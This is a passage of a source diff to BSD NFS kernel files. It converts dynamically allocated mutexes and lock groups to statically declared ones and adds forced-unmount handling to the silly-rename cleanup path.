TAILQ_FIRST(&nmp->nm_gsscl))) { TAILQ_REMOVE(&nmp->nm_gsscl, cp, gss_clnt_entries); cp->gss_clnt_entries.tqe_next = NFSNOLIST; - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); if (cp->gss_clnt_flags & GSS_CTX_DESTROY) { - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); continue; } cp->gss_clnt_refcnt++; - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); req->r_gss_ctx = cp; lck_mtx_unlock(&nmp->nm_lock); @@ -2659,9 +2650,9 @@ nfs_gss_clnt_ctx_unmount(struct nfsmount *nmp) * the reference to remove it if its * refcount is zero. */ - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); cp->gss_clnt_flags |= (GSS_CTX_INVAL | GSS_CTX_DESTROY); - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); nfs_gss_clnt_ctx_unref(req); lck_mtx_lock(&nmp->nm_lock); } @@ -2687,19 +2678,19 @@ nfs_gss_clnt_ctx_remove(struct nfsmount *nmp, kauth_cred_t cred) NFS_GSS_CLNT_CTX_DUMP(nmp); lck_mtx_lock(&nmp->nm_lock); TAILQ_FOREACH_SAFE(cp, &nmp->nm_gsscl, gss_clnt_entries, tcp) { - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); if (nfs_gss_clnt_ctx_cred_match(cp->gss_clnt_cred, cred)) { if (cp->gss_clnt_flags & GSS_CTX_DESTROY) { NFS_GSS_DBG("Found destroyed context %d/%d. refcnt = %d continuing\n", kauth_cred_getasid(cp->gss_clnt_cred), kauth_cred_getauid(cp->gss_clnt_cred), cp->gss_clnt_refcnt); - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); continue; } cp->gss_clnt_refcnt++; cp->gss_clnt_flags |= (GSS_CTX_INVAL | GSS_CTX_DESTROY); - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); req->r_gss_ctx = cp; lck_mtx_unlock(&nmp->nm_lock); /* @@ -2714,7 +2705,7 @@ nfs_gss_clnt_ctx_remove(struct nfsmount *nmp, kauth_cred_t cred) NFS_ZFREE(nfs_req_zone, req); return 0; } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); } lck_mtx_unlock(&nmp->nm_lock); @@ -2783,20 +2774,20 @@ nfs_gss_clnt_ctx_get_principal(struct nfsmount *nmp, vfs_context_t ctx, req->r_nmp = nmp; lck_mtx_lock(&nmp->nm_lock); TAILQ_FOREACH(cp, &nmp->nm_gsscl, gss_clnt_entries) { - lck_mtx_lock(cp->gss_clnt_mtx); + lck_mtx_lock(&cp->gss_clnt_mtx); if (cp->gss_clnt_flags & GSS_CTX_DESTROY) { NFS_GSS_DBG("Found destroyed context %s refcnt = %d continuing\n", NFS_GSS_CTX(req, cp), cp->gss_clnt_refcnt); - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); continue; } if (nfs_gss_clnt_ctx_cred_match(cp->gss_clnt_cred, cred)) { cp->gss_clnt_refcnt++; - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); goto out; } - lck_mtx_unlock(cp->gss_clnt_mtx); + lck_mtx_unlock(&cp->gss_clnt_mtx); } out: @@ -2876,7 +2867,7 @@ nfs_gss_svc_ctx_find(uint32_t handle) */ clock_interval_to_deadline(GSS_CTX_PEND, NSEC_PER_SEC, &timenow); - lck_mtx_lock(nfs_gss_svc_ctx_mutex); + lck_mtx_lock(&nfs_gss_svc_ctx_mutex); LIST_FOREACH(cp, head, gss_svc_entries) { if (cp->gss_svc_handle == handle) { @@ -2896,14 +2887,14 @@ nfs_gss_svc_ctx_find(uint32_t handle) cp = NULL; break; } - lck_mtx_lock(cp->gss_svc_mtx); + lck_mtx_lock(&cp->gss_svc_mtx); cp->gss_svc_refcnt++; - lck_mtx_unlock(cp->gss_svc_mtx); + lck_mtx_unlock(&cp->gss_svc_mtx); break; } } - lck_mtx_unlock(nfs_gss_svc_ctx_mutex); + lck_mtx_unlock(&nfs_gss_svc_ctx_mutex); return cp; } @@ -2918,7 +2909,7 @@ nfs_gss_svc_ctx_insert(struct nfs_gss_svc_ctx *cp) struct nfs_gss_svc_ctx_hashhead *head; struct nfs_gss_svc_ctx *p; - lck_mtx_lock(nfs_gss_svc_ctx_mutex); + lck_mtx_lock(&nfs_gss_svc_ctx_mutex); /* * Give the client a random handle so that if we reboot @@ -2948,7 +2939,7 @@ retry: min(GSS_TIMER_PERIOD, max(GSS_CTX_TTL_MIN, nfsrv_gss_context_ttl)) * MSECS_PER_SEC); } - lck_mtx_unlock(nfs_gss_svc_ctx_mutex); + lck_mtx_unlock(&nfs_gss_svc_ctx_mutex); } /* @@ -2964,7 +2955,7 @@ nfs_gss_svc_ctx_timer(__unused void *param1, __unused void *param2) int contexts = 0; int i; - lck_mtx_lock(nfs_gss_svc_ctx_mutex); + lck_mtx_lock(&nfs_gss_svc_ctx_mutex); clock_get_uptime(&timenow); NFS_GSS_DBG("is running\n"); @@ -2990,7 +2981,7 @@ nfs_gss_svc_ctx_timer(__unused void *param1, __unused void *param2) if (cp->gss_svc_seqbits) { FREE(cp->gss_svc_seqbits, M_TEMP); } - lck_mtx_destroy(cp->gss_svc_mtx, nfs_gss_svc_grp); + lck_mtx_destroy(&cp->gss_svc_mtx, &nfs_gss_svc_grp); FREE(cp, M_TEMP); contexts--; } @@ -3009,7 +3000,7 @@ nfs_gss_svc_ctx_timer(__unused void *param1, __unused void *param2) min(GSS_TIMER_PERIOD, max(GSS_CTX_TTL_MIN, nfsrv_gss_context_ttl)) * MSECS_PER_SEC); } - lck_mtx_unlock(nfs_gss_svc_ctx_mutex); + lck_mtx_unlock(&nfs_gss_svc_ctx_mutex); } /* @@ -3094,7 +3085,7 @@ nfs_gss_svc_cred_get(struct nfsrv_descript *nd, struct nfsm_chain *nmc) error = ENOMEM; goto nfsmout; } - cp->gss_svc_mtx = lck_mtx_alloc_init(nfs_gss_svc_grp, LCK_ATTR_NULL); + lck_mtx_init(&cp->gss_svc_mtx, &nfs_gss_svc_grp, LCK_ATTR_NULL); cp->gss_svc_refcnt = 1; } else { /* @@ -3328,7 +3319,7 @@ nfs_gss_svc_cred_get(struct nfsrv_descript *nd, struct nfsm_chain *nmc) } if (error) { if (proc == RPCSEC_GSS_INIT) { - lck_mtx_destroy(cp->gss_svc_mtx, nfs_gss_svc_grp); + lck_mtx_destroy(&cp->gss_svc_mtx, &nfs_gss_svc_grp); FREE(cp, M_TEMP); cp = NULL; } @@ -3571,10 +3562,10 @@ nfs_gss_svc_ctx_init(struct nfsrv_descript *nd, struct nfsrv_sock *slp, mbuf_t * cp = nfs_gss_svc_ctx_find(cp->gss_svc_handle); if (cp != NULL) { cp->gss_svc_handle = 0; // so it can't be found - lck_mtx_lock(cp->gss_svc_mtx); + lck_mtx_lock(&cp->gss_svc_mtx); clock_interval_to_deadline(GSS_CTX_PEND, NSEC_PER_SEC, &cp->gss_svc_incarnation); - lck_mtx_unlock(cp->gss_svc_mtx); + lck_mtx_unlock(&cp->gss_svc_mtx); } break; default: @@ -3621,7 +3612,7 @@ nfsmout: if (cp->gss_svc_token != NULL) { FREE(cp->gss_svc_token, M_TEMP); } - lck_mtx_destroy(cp->gss_svc_mtx, nfs_gss_svc_grp); + lck_mtx_destroy(&cp->gss_svc_mtx, &nfs_gss_svc_grp); FREE(cp, M_TEMP); } @@ -3778,7 +3769,7 @@ nfs_gss_svc_seqnum_valid(struct nfs_gss_svc_ctx *cp, uint32_t seq) uint32_t win = cp->gss_svc_seqwin; uint32_t i; - lck_mtx_lock(cp->gss_svc_mtx); + lck_mtx_lock(&cp->gss_svc_mtx); /* * If greater than the window upper bound, @@ -3794,7 +3785,7 @@ nfs_gss_svc_seqnum_valid(struct nfs_gss_svc_ctx *cp, uint32_t seq) } win_setbit(bits, seq % win); cp->gss_svc_seqmax = seq; - lck_mtx_unlock(cp->gss_svc_mtx); + lck_mtx_unlock(&cp->gss_svc_mtx); return 1; } @@ -3802,7 +3793,7 @@ nfs_gss_svc_seqnum_valid(struct nfs_gss_svc_ctx *cp, uint32_t seq) * Invalid if below the lower bound of the window */ if (seq <= cp->gss_svc_seqmax - win) { - lck_mtx_unlock(cp->gss_svc_mtx); + lck_mtx_unlock(&cp->gss_svc_mtx); return 0; } @@ -3810,11 +3801,11 @@ nfs_gss_svc_seqnum_valid(struct nfs_gss_svc_ctx *cp, uint32_t seq) * In the window, invalid if the bit is already set */ if (win_getbit(bits, seq % win)) { - lck_mtx_unlock(cp->gss_svc_mtx); + lck_mtx_unlock(&cp->gss_svc_mtx); return 0; } win_setbit(bits, seq % win); - lck_mtx_unlock(cp->gss_svc_mtx); + lck_mtx_unlock(&cp->gss_svc_mtx); return 1; } @@ -3828,13 +3819,13 @@ nfs_gss_svc_seqnum_valid(struct nfs_gss_svc_ctx *cp, uint32_t seq) void nfs_gss_svc_ctx_deref(struct nfs_gss_svc_ctx *cp) { - lck_mtx_lock(cp->gss_svc_mtx); + lck_mtx_lock(&cp->gss_svc_mtx); if (cp->gss_svc_refcnt > 0) { cp->gss_svc_refcnt--; } else { printf("nfs_gss_ctx_deref: zero refcount\n"); } - lck_mtx_unlock(cp->gss_svc_mtx); + lck_mtx_unlock(&cp->gss_svc_mtx); } /* @@ -3847,7 +3838,7 @@ nfs_gss_svc_cleanup(void) struct nfs_gss_svc_ctx *cp, *ncp; int i; - lck_mtx_lock(nfs_gss_svc_ctx_mutex); + lck_mtx_lock(&nfs_gss_svc_ctx_mutex); /* * Run through all the buckets @@ -3862,12 +3853,12 @@ nfs_gss_svc_cleanup(void) if (cp->gss_svc_seqbits) { FREE(cp->gss_svc_seqbits, M_TEMP); } - lck_mtx_destroy(cp->gss_svc_mtx, nfs_gss_svc_grp); + lck_mtx_destroy(&cp->gss_svc_mtx, &nfs_gss_svc_grp); FREE(cp, M_TEMP); } } - lck_mtx_unlock(nfs_gss_svc_ctx_mutex); + lck_mtx_unlock(&nfs_gss_svc_ctx_mutex); } #endif /* CONFIG_NFS_SERVER */ diff --git a/bsd/nfs/nfs_gss.h b/bsd/nfs/nfs_gss.h index 01aaabee7..05680ef89 100644 --- a/bsd/nfs/nfs_gss.h +++ b/bsd/nfs/nfs_gss.h @@ -85,7 +85,7 @@ extern u_char krb5_mech_oid[11]; * The client's RPCSEC_GSS context information */ struct nfs_gss_clnt_ctx { - lck_mtx_t *gss_clnt_mtx; + lck_mtx_t gss_clnt_mtx; thread_t gss_clnt_thread; // Thread creating context TAILQ_ENTRY(nfs_gss_clnt_ctx) gss_clnt_entries; uint32_t gss_clnt_flags; // Flag bits - see below @@ -135,7 +135,7 @@ struct nfs_gss_clnt_ctx { * The server's RPCSEC_GSS context information */ struct nfs_gss_svc_ctx { - lck_mtx_t *gss_svc_mtx; + lck_mtx_t gss_svc_mtx; LIST_ENTRY(nfs_gss_svc_ctx) gss_svc_entries; uint32_t gss_svc_handle; // Identifies server context to client uint32_t gss_svc_refcnt; // Reference count diff --git a/bsd/nfs/nfs_lock.c b/bsd/nfs/nfs_lock.c index 4b0d19631..5872d1840 100644 --- a/bsd/nfs/nfs_lock.c +++ b/bsd/nfs/nfs_lock.c @@ -103,13 +103,14 @@ extern void ipc_port_release_send(ipc_port_t); * kept sorted by transaction ID (xid). */ static uint64_t nfs_lockxid = 0; -static LOCKD_MSG_QUEUE nfs_pendlockq; +static LOCKD_MSG_QUEUE nfs_pendlockq = TAILQ_HEAD_INITIALIZER(nfs_pendlockq); /* list of mounts that are (potentially) making lockd requests */ -TAILQ_HEAD(nfs_lockd_mount_list, nfsmount) nfs_lockd_mount_list; +TAILQ_HEAD(nfs_lockd_mount_list, nfsmount) nfs_lockd_mount_list = + TAILQ_HEAD_INITIALIZER(nfs_lockd_mount_list); -static lck_grp_t *nfs_lock_lck_grp; -static lck_mtx_t *nfs_lock_mutex; +static LCK_GRP_DECLARE(nfs_lock_lck_grp, "nfs_lock"); +static LCK_MTX_DECLARE(nfs_lock_mutex, &nfs_lock_lck_grp); void nfs_lockdmsg_enqueue(LOCKD_MSG_REQUEST *); void nfs_lockdmsg_dequeue(LOCKD_MSG_REQUEST *); @@ -119,29 +120,16 @@ LOCKD_MSG_REQUEST *nfs_lockdmsg_find_by_xid(uint64_t); uint64_t nfs_lockxid_get(void); int nfs_lockd_send_request(LOCKD_MSG *, int); -/* - * initialize global nfs lock state - */ -void -nfs_lockinit(void) -{ - TAILQ_INIT(&nfs_pendlockq); - TAILQ_INIT(&nfs_lockd_mount_list); - - nfs_lock_lck_grp = lck_grp_alloc_init("nfs_lock", LCK_GRP_ATTR_NULL); - nfs_lock_mutex = lck_mtx_alloc_init(nfs_lock_lck_grp, LCK_ATTR_NULL); -} - /* * Register a mount as (potentially) making lockd requests. */ void nfs_lockd_mount_register(struct nfsmount *nmp) { - lck_mtx_lock(nfs_lock_mutex); + lck_mtx_lock(&nfs_lock_mutex); TAILQ_INSERT_HEAD(&nfs_lockd_mount_list, nmp, nm_ldlink); nfs_lockd_mounts++; - lck_mtx_unlock(nfs_lock_mutex); + lck_mtx_unlock(&nfs_lock_mutex); } /* @@ -157,9 +145,9 @@ nfs_lockd_mount_unregister(struct nfsmount *nmp) mach_port_t lockd_port = IPC_PORT_NULL; kern_return_t kr; - lck_mtx_lock(nfs_lock_mutex); + lck_mtx_lock(&nfs_lock_mutex); if (nmp->nm_ldlink.tqe_next == NFSNOLIST) { - lck_mtx_unlock(nfs_lock_mutex); + lck_mtx_unlock(&nfs_lock_mutex); return; } @@ -174,7 +162,7 @@ nfs_lockd_mount_unregister(struct nfsmount *nmp) nfs_lockd_request_sent = 0; } - lck_mtx_unlock(nfs_lock_mutex); + lck_mtx_unlock(&nfs_lock_mutex); if (!send_shutdown) { return; @@ -463,7 +451,7 @@ nfs3_lockd_request( interruptable = NMFLAG(nmp, INTR); lck_mtx_unlock(&nmp->nm_lock); - lck_mtx_lock(nfs_lock_mutex); + lck_mtx_lock(&nfs_lock_mutex); /* allocate unique xid */ msg->lm_xid = nfs_lockxid_get(); @@ -475,9 +463,9 @@ nfs3_lockd_request( nfs_lockd_request_sent = 1; /* need to drop nfs_lock_mutex while calling nfs_lockd_send_request() */ - lck_mtx_unlock(nfs_lock_mutex); + lck_mtx_unlock(&nfs_lock_mutex); error = nfs_lockd_send_request(msg, interruptable); - lck_mtx_lock(nfs_lock_mutex); + lck_mtx_lock(&nfs_lock_mutex); if (error && error != EAGAIN) { break; } @@ -507,7 +495,7 @@ wait_for_granted: while (now.tv_sec < endtime) { error = error2 = 0; if (!msgreq->lmr_answered) { - error = msleep(msgreq, nfs_lock_mutex, slpflag | PUSER, "lockd", &ts); + error = msleep(msgreq, &nfs_lock_mutex, slpflag | PUSER, "lockd", &ts); slpflag = 0; } if (msgreq->lmr_answered) { @@ -736,7 +724,7 @@ wait_for_granted: * for this mount. */ nfs_lockdmsg_dequeue(msgreq); - lck_mtx_unlock(nfs_lock_mutex); + lck_mtx_unlock(&nfs_lock_mutex); lck_mtx_lock(&nmp->nm_lock); if (nmp->nm_lockmode == NFS_LOCK_MODE_ENABLED) { nmp->nm_lockmode = NFS_LOCK_MODE_DISABLED; @@ -763,7 +751,7 @@ wait_for_granted: nfs_lockdmsg_dequeue(msgreq); - lck_mtx_unlock(nfs_lock_mutex); + lck_mtx_unlock(&nfs_lock_mutex); return error; } @@ -941,7 +929,7 @@ nfslockdans(proc_t p, struct lockd_ans *ansp) return EINVAL; } - lck_mtx_lock(nfs_lock_mutex); + lck_mtx_lock(&nfs_lock_mutex); /* try to find the lockd message by transaction id (cookie) */ msgreq = nfs_lockdmsg_find_by_xid(ansp->la_xid); @@ -964,7 +952,7 @@ nfslockdans(proc_t p, struct lockd_ans *ansp) } } if (!msgreq) { - lck_mtx_unlock(nfs_lock_mutex); + lck_mtx_unlock(&nfs_lock_mutex); return EPIPE; } @@ -988,7 +976,7 @@ nfslockdans(proc_t p, struct lockd_ans *ansp) } msgreq->lmr_answered = 1; - lck_mtx_unlock(nfs_lock_mutex); + lck_mtx_unlock(&nfs_lock_mutex); wakeup(msgreq); return 0; @@ -1029,7 +1017,7 @@ nfslockdnotify(proc_t p, user_addr_t argp) argp += headsize; saddr = (struct sockaddr *)&ln.ln_addr[0]; - lck_mtx_lock(nfs_lock_mutex); + lck_mtx_lock(&nfs_lock_mutex); for (i = 0; i < ln.ln_addrcount; i++) { error = copyin(argp, &ln.ln_addr[0], sizeof(ln.ln_addr[0])); @@ -1050,7 +1038,7 @@ nfslockdnotify(proc_t p, user_addr_t argp) } } - lck_mtx_unlock(nfs_lock_mutex); + lck_mtx_unlock(&nfs_lock_mutex); return error; } diff --git a/bsd/nfs/nfs_lock.h b/bsd/nfs/nfs_lock.h index b360849e6..7e4b07590 100644 --- a/bsd/nfs/nfs_lock.h +++ b/bsd/nfs/nfs_lock.h @@ -144,7 +144,6 @@ struct lockd_notify { #ifdef KERNEL -void nfs_lockinit(void); void nfs_lockd_mount_register(struct nfsmount *); void nfs_lockd_mount_unregister(struct nfsmount *); int nfs3_lockd_request(nfsnode_t, int, LOCKD_MSG_REQUEST *, int, thread_t); diff --git a/bsd/nfs/nfs_node.c b/bsd/nfs/nfs_node.c index c47fa9263..84745f933 100644 --- a/bsd/nfs/nfs_node.c +++ b/bsd/nfs/nfs_node.c @@ -93,37 +93,24 @@ static LIST_HEAD(nfsnodehashhead, nfsnode) * nfsnodehashtbl; static u_long nfsnodehash; -static lck_grp_t *nfs_node_hash_lck_grp; -static lck_grp_t *nfs_node_lck_grp; -static lck_grp_t *nfs_data_lck_grp; -lck_mtx_t *nfs_node_hash_mutex; +static LCK_GRP_DECLARE(nfs_node_hash_lck_grp, "nfs_node_hash"); +static LCK_GRP_DECLARE(nfs_node_lck_grp, "nfs_node"); +static LCK_GRP_DECLARE(nfs_data_lck_grp, "nfs_data"); +LCK_MTX_DECLARE(nfs_node_hash_mutex, &nfs_node_hash_lck_grp); ZONE_DECLARE(nfsnode_zone, "NFS node", sizeof(struct nfsnode), ZC_ZFREE_CLEARMEM); #define NFS_NODE_DBG(...) NFS_DBG(NFS_FAC_NODE, 7, ## __VA_ARGS__) -/* - * Initialize hash links for nfsnodes - * and build nfsnode free list. - */ -void -nfs_nhinit(void) -{ - nfs_node_hash_lck_grp = lck_grp_alloc_init("nfs_node_hash", LCK_GRP_ATTR_NULL); - nfs_node_hash_mutex = lck_mtx_alloc_init(nfs_node_hash_lck_grp, LCK_ATTR_NULL); - nfs_node_lck_grp = lck_grp_alloc_init("nfs_node", LCK_GRP_ATTR_NULL); - nfs_data_lck_grp = lck_grp_alloc_init("nfs_data", LCK_GRP_ATTR_NULL); -} - void nfs_nhinit_finish(void) { - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); if (!nfsnodehashtbl) { nfsnodehashtbl = hashinit(desiredvnodes, M_NFSNODE, &nfsnodehash); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); } /* @@ -226,7 +213,7 @@ nfs_nget( cn_namelen = cnp ? cnp->cn_namelen : 0; nfshash = nfs_hash(fhp, fhsize); loop: - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); nhpp = NFSNOHASH(nfshash); for (np = nhpp->lh_first; np != 0; np = np->n_hash.le_next) { mp2 = (np->n_hflag & NHINIT) ? np->n_mount : NFSTOMP(np); @@ -256,13 +243,13 @@ loop: if ((np->n_hflag & NHINIT) || ((np->n_hflag & NHLOCKED) && !(flags & NG_NOCREATE))) { np->n_hflag |= NHLOCKWANT; FSDBG(263, dnp, np, np->n_flag, 0xcace2222); - msleep(np, nfs_node_hash_mutex, PDROP | PINOD, "nfs_nget", NULL); + msleep(np, &nfs_node_hash_mutex, PDROP | PINOD, "nfs_nget", NULL); FSDBG(263, dnp, np, np->n_flag, 0xcace3333); goto loop; } vp = NFSTOV(np); vid = vnode_vid(vp); - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); if ((error = vnode_getwithvid(vp, vid))) { /* * If vnode is being reclaimed or has already @@ -389,7 +376,7 @@ loop: FSDBG(263, mp, dnp, npp, 0xaaaaaaaa); if (flags & NG_NOCREATE) { - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); *npp = 0; FSDBG_BOT(263, dnp, *npp, 0x80000001, ENOENT); return ENOENT; @@ -436,7 +423,7 @@ loop: if (fhsize > NFS_SMALLFH) { MALLOC(np->n_fhp, u_char *, fhsize, M_NFSBIGFH, M_WAITOK); if (!np->n_fhp) { - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); NFS_ZFREE(nfsnode_zone, np); *npp = 0; FSDBG_BOT(263, dnp, *npp, 0x80000002, ENOMEM); @@ -454,13 +441,13 @@ loop: FSDBG(266, 0, np, np->n_flag, np->n_hflag); /* lock the new nfsnode */ - lck_mtx_init(&np->n_lock, nfs_node_lck_grp, LCK_ATTR_NULL); - lck_rw_init(&np->n_datalock, nfs_data_lck_grp, LCK_ATTR_NULL); - lck_mtx_init(&np->n_openlock, nfs_open_grp, LCK_ATTR_NULL); + lck_mtx_init(&np->n_lock, &nfs_node_lck_grp, LCK_ATTR_NULL); + lck_rw_init(&np->n_datalock, &nfs_data_lck_grp, LCK_ATTR_NULL); + lck_mtx_init(&np->n_openlock, &nfs_open_grp, LCK_ATTR_NULL); lck_mtx_lock(&np->n_lock); /* release lock on hash table */ - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); /* do initial loading of attributes */ NACLINVALIDATE(np); @@ -469,14 +456,14 @@ loop: if (error) { FSDBG(266, 0, np, np->n_flag, 0xb1eb1e); nfs_node_unlock(np); - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); LIST_REMOVE(np, n_hash); np->n_hflag &= ~(NHHASHED | NHINIT | NHLOCKED); if (np->n_hflag & NHLOCKWANT) { np->n_hflag &= ~NHLOCKWANT; wakeup(np); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); if (np->n_parent) { if (!vnode_get(np->n_parent)) { vnode_rele(np->n_parent); @@ -484,9 +471,9 @@ loop: } np->n_parent = NULL; } - lck_mtx_destroy(&np->n_lock, nfs_node_lck_grp); - lck_rw_destroy(&np->n_datalock, nfs_data_lck_grp); - lck_mtx_destroy(&np->n_openlock, nfs_open_grp); + lck_mtx_destroy(&np->n_lock, &nfs_node_lck_grp); + lck_rw_destroy(&np->n_datalock, &nfs_data_lck_grp); + lck_mtx_destroy(&np->n_openlock, &nfs_open_grp); if (np->n_fhsize > NFS_SMALLFH) { FREE(np->n_fhp, M_NFSBIGFH); } @@ -563,14 +550,14 @@ loop: if (error) { FSDBG(266, 0, np, np->n_flag, 0xb1eb1e); nfs_node_unlock(np); - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); LIST_REMOVE(np, n_hash); np->n_hflag &= ~(NHHASHED | NHINIT | NHLOCKED); if (np->n_hflag & NHLOCKWANT) { np->n_hflag &= ~NHLOCKWANT; wakeup(np); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); if (np->n_parent) { if (!vnode_get(np->n_parent)) { vnode_rele(np->n_parent); @@ -578,9 +565,9 @@ loop: } np->n_parent = NULL; } - lck_mtx_destroy(&np->n_lock, nfs_node_lck_grp); - lck_rw_destroy(&np->n_datalock, nfs_data_lck_grp); - lck_mtx_destroy(&np->n_openlock, nfs_open_grp); + lck_mtx_destroy(&np->n_lock, &nfs_node_lck_grp); + lck_rw_destroy(&np->n_datalock, &nfs_data_lck_grp); + lck_mtx_destroy(&np->n_openlock, &nfs_open_grp); if (np->n_fhsize > NFS_SMALLFH) { FREE(np->n_fhp, M_NFSBIGFH); } @@ -594,13 +581,13 @@ loop: /* node is now initialized */ /* check if anyone's waiting on this node */ - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); np->n_hflag &= ~(NHINIT | NHLOCKED); if (np->n_hflag & NHLOCKWANT) { np->n_hflag &= ~NHLOCKWANT; wakeup(np); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); *npp = np; @@ -835,28 +822,37 @@ restart: ubc_setsize(vp, 0); } - /* mark this node and the directory busy while we do the remove */ - busyerror = nfs_node_set_busy2(nsp->nsr_dnp, np, vfs_context_thread(ctx)); + if (!vfs_isforce(nmp->nm_mountp)) { + /* mark this node and the directory busy while we do the remove */ + busyerror = nfs_node_set_busy2(nsp->nsr_dnp, np, vfs_context_thread(ctx)); + } else { + /* we are in force unmount we can't trust nsp->nsr_dnp, mark this np busy only */ + busyerror = nfs_node_set_busy(np, vfs_context_thread(ctx)); + } /* lock the node while we remove the silly file */ - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); while (np->n_hflag & NHLOCKED) { np->n_hflag |= NHLOCKWANT; - msleep(np, nfs_node_hash_mutex, PINOD, "nfs_inactive", NULL); + msleep(np, &nfs_node_hash_mutex, PINOD, "nfs_inactive", NULL); } np->n_hflag |= NHLOCKED; - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); - /* purge the name cache to deter others from finding it */ - bzero(&cn, sizeof(cn)); - cn.cn_nameptr = nsp->nsr_name; - cn.cn_namelen = nsp->nsr_namlen; - nfs_name_cache_purge(nsp->nsr_dnp, np, &cn, ctx); + if (!vfs_isforce(nmp->nm_mountp)) { + /* purge the name cache to deter others from finding it */ + bzero(&cn, sizeof(cn)); + cn.cn_nameptr = nsp->nsr_name; + cn.cn_namelen = nsp->nsr_namlen; + nfs_name_cache_purge(nsp->nsr_dnp, np, &cn, ctx); + } FSDBG(264, np, np->n_size, np->n_vattr.nva_size, 0xf00d00f1); - /* now remove the silly file */ - nfs_removeit(nsp); + if (!vfs_isforce(nmp->nm_mountp)) { + /* now remove the silly file */ + nfs_removeit(nsp); + } /* clear all flags other than these */ nfs_node_lock_force(np); @@ -864,7 +860,11 @@ restart: nfs_node_unlock(np); if (!busyerror) { - nfs_node_clear_busy2(nsp->nsr_dnp, np); + if (!vfs_isforce(nmp->nm_mountp)) { + nfs_node_clear_busy2(nsp->nsr_dnp, np); + } else { + nfs_node_clear_busy(np); + } } if (unhash && vnode_isinuse(vp, 0)) { @@ -873,7 +873,7 @@ restart: ubc_setsize(vp, np->n_size); } - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); if (unhash) { /* * remove nfsnode from hash now so we can't accidentally find it @@ -893,13 +893,16 @@ restart: np->n_hflag &= ~NHLOCKWANT; wakeup(np); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); /* cleanup sillyrename info */ if (nsp->nsr_cred != NOCRED) { kauth_cred_unref(&nsp->nsr_cred); } - vnode_rele(NFSTOV(nsp->nsr_dnp)); + if (!vfs_isforce(nmp->nm_mountp)) { + /* in case of forceful unmount usecounts ignore anyways */ + vnode_rele(NFSTOV(nsp->nsr_dnp)); + } FREE(nsp, M_TEMP); FSDBG_BOT(264, vp, np, np->n_flag, 0); out_free: @@ -1056,14 +1059,14 @@ nfs_vnop_reclaim( lck_mtx_unlock(&nmp->nm_lock); } - lck_mtx_lock(nfs_buf_mutex); + lck_mtx_lock(&nfs_buf_mutex); if (!force && (!LIST_EMPTY(&np->n_dirtyblkhd) || !LIST_EMPTY(&np->n_cleanblkhd))) { NP(np, "nfs_reclaim: dropping %s buffers", (!LIST_EMPTY(&np->n_dirtyblkhd) ? "dirty" : "clean")); } - lck_mtx_unlock(nfs_buf_mutex); + lck_mtx_unlock(&nfs_buf_mutex); nfs_vinvalbuf(vp, V_IGNORE_WRITEERR, ap->a_context, 0); - lck_mtx_lock(nfs_node_hash_mutex); + lck_mtx_lock(&nfs_node_hash_mutex); if ((vnode_vtype(vp) != VDIR) && np->n_sillyrename) { if (!force) { @@ -1083,7 +1086,7 @@ nfs_vnop_reclaim( np->n_hflag &= ~NHHASHED; FSDBG(266, 0, np, np->n_flag, 0xb1eb1e); } - lck_mtx_unlock(nfs_node_hash_mutex); + lck_mtx_unlock(&nfs_node_hash_mutex); /* * Free up any directory cookie structures and large file handle @@ -1110,9 +1113,9 @@ nfs_vnop_reclaim( np->n_parent = NULL; } - lck_mtx_destroy(&np->n_lock, nfs_node_lck_grp); - lck_rw_destroy(&np->n_datalock, nfs_data_lck_grp); - lck_mtx_destroy(&np->n_openlock, nfs_open_grp); + lck_mtx_destroy(&np->n_lock, &nfs_node_lck_grp); + lck_rw_destroy(&np->n_datalock, &nfs_data_lck_grp); + lck_mtx_destroy(&np->n_openlock, &nfs_open_grp); FSDBG_BOT(265, vp, np, np->n_flag, 0xd1ed1e); NFS_ZFREE(nfsnode_zone, np); @@ -1434,7 +1437,7 @@ nfs_mount_is_dirty(mount_t mp) u_long ncnt = 0; microuptime(&now); #endif - lck_mtx_lock(nfs_node_hash_mutex); + 